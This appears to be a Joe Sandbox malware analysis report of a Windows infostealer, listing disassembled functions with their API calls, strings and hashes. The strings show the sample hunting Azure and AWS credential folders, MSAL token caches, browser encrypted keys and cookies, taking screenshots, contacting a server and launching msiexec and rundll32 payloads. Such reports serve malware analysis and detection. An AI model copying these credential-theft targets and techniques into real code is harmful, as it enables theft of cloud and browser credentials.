                                          • Part of subcall function 0097C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0097C97C
                                        • StrStrA.SHLWAPI(?,0181E188,00000000,?,00991554,00000000,?,00000000,018189F8), ref: 0097CE5A
                                        • StrStrA.SHLWAPI(00000000,01818BC8), ref: 0097CE71
                                          • Part of subcall function 0097C920: lstrcat.KERNEL32(?,00990B47), ref: 0097CA43
                                          • Part of subcall function 0097C920: lstrcat.KERNEL32(?,00990B4B), ref: 0097CA57
                                          • Part of subcall function 0097C920: lstrcat.KERNEL32(?,00990B4E), ref: 0097CA78
                                        • lstrlen.KERNEL32(00000000), ref: 0097CF44
                                        • CloseHandle.KERNEL32(00000000), ref: 0097CF9C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                        • String ID:
                                        • API String ID: 3744635739-3916222277
                                        • Opcode ID: 8098f1eec20509ca8e8517f72cce3d14d7001d98f33a46a35a8460d0e0309844
                                        • Instruction ID: ae195ac3be88b3eba15e7146621925809b154e8f9f23de3c19b5d4a6e914900a
                                        • Opcode Fuzzy Hash: 8098f1eec20509ca8e8517f72cce3d14d7001d98f33a46a35a8460d0e0309844
                                        • Instruction Fuzzy Hash: 98E1EF75910108ABDB14FBA4DCA2FEEB779BF94300F00459AF10677291EF386A49CB65
                                        Function 009884B0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                        • RegOpenKeyExA.ADVAPI32(00000000,0181BC10,00000000,00020019,00000000,009905BE), ref: 00988534
                                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 009885B6
                                        • wsprintfA.USER32 ref: 009885E9
                                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0098860B
                                        • RegCloseKey.ADVAPI32(00000000), ref: 0098861C
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00988629
                                          • Part of subcall function 0098AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0098AAF6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpenlstrcpy$Enumwsprintf
                                        • String ID: - $%s\%s$?
                                        • API String ID: 3246050789-3278919252
                                        • Opcode ID: 09002091fa6a356e76626bb78b182b92e238269e780910093c5a6459456aabd2
                                        • Instruction ID: a6fb14b906ca5ef4b9382be29fd48520e337e8a47cbbd1f66aa5e1b1056e8b42
                                        • Opcode Fuzzy Hash: 09002091fa6a356e76626bb78b182b92e238269e780910093c5a6459456aabd2
                                        • Instruction Fuzzy Hash: D0811F759111189BEB28EB54CD95FEE77B8BF48700F1086D9F109A6280DF746B84CFA0
                                        Function 00984FC0 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00988F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00988F9B
                                        • lstrcat.KERNEL32(?,00000000), ref: 00985000
                                        • lstrcat.KERNEL32(?,\.azure\), ref: 0098501D
                                          • Part of subcall function 00984B60: wsprintfA.USER32 ref: 00984B7C
                                          • Part of subcall function 00984B60: FindFirstFileA.KERNEL32(?,?), ref: 00984B93
                                        • lstrcat.KERNEL32(?,00000000), ref: 0098508C
                                        • lstrcat.KERNEL32(?,\.aws\), ref: 009850A9
                                          • Part of subcall function 00984B60: StrCmpCA.SHLWAPI(?,00990FC4), ref: 00984BC1
                                          • Part of subcall function 00984B60: StrCmpCA.SHLWAPI(?,00990FC8), ref: 00984BD7
                                          • Part of subcall function 00984B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00984DCD
                                          • Part of subcall function 00984B60: FindClose.KERNEL32(000000FF), ref: 00984DE2
                                        • lstrcat.KERNEL32(?,00000000), ref: 00985118
                                        • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00985135
                                          • Part of subcall function 00984B60: wsprintfA.USER32 ref: 00984C00
                                          • Part of subcall function 00984B60: StrCmpCA.SHLWAPI(?,009908D3), ref: 00984C15
                                          • Part of subcall function 00984B60: wsprintfA.USER32 ref: 00984C32
                                          • Part of subcall function 00984B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00984C6E
                                          • Part of subcall function 00984B60: lstrcat.KERNEL32(?,0181FC40), ref: 00984C9A
                                          • Part of subcall function 00984B60: lstrcat.KERNEL32(?,00990FE0), ref: 00984CAC
                                          • Part of subcall function 00984B60: lstrcat.KERNEL32(?,?), ref: 00984CC0
                                          • Part of subcall function 00984B60: lstrcat.KERNEL32(?,00990FE4), ref: 00984CD2
                                          • Part of subcall function 00984B60: lstrcat.KERNEL32(?,?), ref: 00984CE6
                                          • Part of subcall function 00984B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00984CFC
                                          • Part of subcall function 00984B60: DeleteFileA.KERNEL32(?), ref: 00984D81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                        • API String ID: 949356159-974132213
                                        • Opcode ID: 49f019ef4c3d4dcd7102e4eab63c993c2f2aa2f19e4aa4758156c334ffc35cec
                                        • Instruction ID: 9da4d916f16630204a43c5339d4b879773cb0f7282afd01c54532b757c954c44
                                        • Opcode Fuzzy Hash: 49f019ef4c3d4dcd7102e4eab63c993c2f2aa2f19e4aa4758156c334ffc35cec
                                        • Instruction Fuzzy Hash: EE41937AA4020867DF24F770DC47FDD73286FE4704F404994B249661C1EEB9A7D88B92
                                        Function 009891A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 009891FC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateGlobalStream
                                        • String ID: image/jpeg
                                        • API String ID: 2244384528-3785015651
                                        • Opcode ID: 1036d805b183be7efd4772e6ef45ceb76f6c030265079821683f3b11ae411995
                                        • Instruction ID: e6f46dc0f4ea0d4720c8f60f6863f574e3572f4eaecc4a495ed8f728dcf380ce
                                        • Opcode Fuzzy Hash: 1036d805b183be7efd4772e6ef45ceb76f6c030265079821683f3b11ae411995
                                        • Instruction Fuzzy Hash: EA71BA75A14208EBDB14EFE4DC89FEEB7B9BB49700F148609F516A7290DB74E904CB60
                                        Function 00983080 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00983415
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 009835AD
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 0098373A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExecuteShell$lstrcpy
                                        • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                        • API String ID: 2507796910-3625054190
                                        • Opcode ID: 1ef3398eb8e707248444a1f6785c1967555aedf672b5e23b9b92b69e3ba38f3a
                                        • Instruction ID: 98d6fdad2795c7cd21705666d050d3c3f7642912322b6bfd3009158d964e8d75
                                        • Opcode Fuzzy Hash: 1ef3398eb8e707248444a1f6785c1967555aedf672b5e23b9b92b69e3ba38f3a
                                        • Instruction Fuzzy Hash: DD12FF719101189ADB14FBA0DDA2FEEB739BF94300F40459AF50676292EF386B49CF61
                                        Function 00979BE0 Relevance: 19.6, APIs: 8, Strings: 5, Instructions: 146stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00979A50: InternetOpenA.WININET(00990AF6,00000001,00000000,00000000,00000000), ref: 00979A6A
                                        • lstrcat.KERNEL32(?,cookies), ref: 00979CAF
                                        • lstrcat.KERNEL32(?,009912C4), ref: 00979CC1
                                        • lstrcat.KERNEL32(?,?), ref: 00979CD5
                                        • lstrcat.KERNEL32(?,009912C8), ref: 00979CE7
                                        • lstrcat.KERNEL32(?,?), ref: 00979CFB
                                        • lstrcat.KERNEL32(?,.txt), ref: 00979D0D
                                        • lstrlen.KERNEL32(00000000), ref: 00979D17
                                        • lstrlen.KERNEL32(00000000), ref: 00979D26
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                                        • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                        • API String ID: 3174675846-3542011879
                                        • Opcode ID: 8bee6c12ba944bcdc9295ebeedd487303a7cc524d9a297739e2f8a6a60618f26
                                        • Instruction ID: ad0041332a0a83c3d5266c8735c17f0dbce9a9f90a6bc0c7f84f7f65f3efb66c
                                        • Opcode Fuzzy Hash: 8bee6c12ba944bcdc9295ebeedd487303a7cc524d9a297739e2f8a6a60618f26
                                        • Instruction Fuzzy Hash: BC514E76910508ABCB14EBE4DC99FEE7338BB84301F408658F11AA7191EB74AA48CF61
                                        Function 00985510 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0098AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0098AAF6
                                          • Part of subcall function 009762D0: InternetOpenA.WININET(00990DFF,00000001,00000000,00000000,00000000), ref: 00976331
                                          • Part of subcall function 009762D0: StrCmpCA.SHLWAPI(?,0181FCB0), ref: 00976353
                                          • Part of subcall function 009762D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00976385
                                          • Part of subcall function 009762D0: HttpOpenRequestA.WININET(00000000,GET,?,0181F008,00000000,00000000,00400100,00000000), ref: 009763D5
                                          • Part of subcall function 009762D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0097640F
                                          • Part of subcall function 009762D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00976421
                                          • Part of subcall function 0098ABB0: lstrcpy.KERNEL32(?,00990E1A), ref: 0098AC15
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00985568
                                        • lstrlen.KERNEL32(00000000), ref: 0098557F
                                          • Part of subcall function 00988FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00988FE2
                                        • StrStrA.SHLWAPI(00000000,00000000), ref: 009855B4
                                        • lstrlen.KERNEL32(00000000), ref: 009855D3
                                        • lstrlen.KERNEL32(00000000), ref: 009855FE
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                        • API String ID: 3240024479-1526165396
                                        • Opcode ID: e4a1ec9fcb9862edfa5026c0bb797250b7db0935e10e1732c3faaa9194ba4967
                                        • Instruction ID: 21b52aa9186e697f08259fe503d587b6d1bbd72be580de167d834feaa53e4728
                                        • Opcode Fuzzy Hash: e4a1ec9fcb9862edfa5026c0bb797250b7db0935e10e1732c3faaa9194ba4967
                                        • Instruction Fuzzy Hash: 9151FC70510108DBDB18FF64CDA6BED773ABF90341F508459F40A67692EB386B49CB62
                                        Function 00981520 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpylstrlen
                                        • String ID:
                                        • API String ID: 2001356338-0
                                        • Opcode ID: 2d9855716722a8c1db88cbbf6d231f1209af19c6dea47c52257c04ac6b7d254c
                                        • Instruction ID: 9d88e4257fe9767650289f300300f273b69d470136f9156df890add40d10f312
                                        • Opcode Fuzzy Hash: 2d9855716722a8c1db88cbbf6d231f1209af19c6dea47c52257c04ac6b7d254c
                                        • Instruction Fuzzy Hash: 70C190B59002199BCB14FF60DC99FEE7378BF94304F004599E50AA7281EB74EA85CFA1
                                        Function 009844D0 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00988F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00988F9B
                                        • lstrcat.KERNEL32(?,00000000), ref: 0098453C
                                        • lstrcat.KERNEL32(?,0181F620), ref: 0098455B
                                        • lstrcat.KERNEL32(?,?), ref: 0098456F
                                        • lstrcat.KERNEL32(?,0181DDD8), ref: 00984583
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                          • Part of subcall function 00988F20: GetFileAttributesA.KERNEL32(00000000,?,00971B94,?,?,0099577C,?,?,00990E22), ref: 00988F2F
                                          • Part of subcall function 0097A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0097A489
                                          • Part of subcall function 0097A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0097A13C
                                          • Part of subcall function 0097A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0097A161
                                          • Part of subcall function 0097A110: LocalAlloc.KERNEL32(00000040,?), ref: 0097A181
                                          • Part of subcall function 0097A110: ReadFile.KERNEL32(000000FF,?,00000000,0097148F,00000000), ref: 0097A1AA
                                          • Part of subcall function 0097A110: LocalFree.KERNEL32(0097148F), ref: 0097A1E0
                                          • Part of subcall function 0097A110: CloseHandle.KERNEL32(000000FF), ref: 0097A1EA
                                          • Part of subcall function 00989550: GlobalAlloc.KERNEL32(00000000,0098462D,0098462D), ref: 00989563
                                        • StrStrA.SHLWAPI(?,0181F6F8), ref: 00984643
                                        • GlobalFree.KERNEL32(?), ref: 00984762
                                          • Part of subcall function 0097A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00974F3E,00000000,00000000), ref: 0097A23F
                                          • Part of subcall function 0097A210: LocalAlloc.KERNEL32(00000040,?,?,?,00974F3E,00000000,?), ref: 0097A251
